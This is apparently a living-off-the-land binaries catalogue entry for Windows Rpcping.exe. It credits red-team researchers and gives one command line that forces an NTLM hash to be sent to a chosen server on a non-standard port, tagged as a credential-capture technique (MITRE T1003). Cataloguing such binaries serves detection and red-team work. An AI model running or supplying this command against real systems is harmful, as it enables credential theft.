.. / Rpcping.exe
Star

Used to verify rpc connection


Paths:


Resources:
https://github.com/vysec/RedTips
https://twitter.com/vysecurity/status/974806438316072960
https://twitter.com/vysecurity/status/873181705024266241

Acknowledgement:
Casey Smith - @subtee
Vincent Yiu - @vysecurity


Detection:



Credentials

Send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.
rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM
Usecase:Capture credentials on a non-standard port
Privileges required:User
OS:Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Mitre:T1003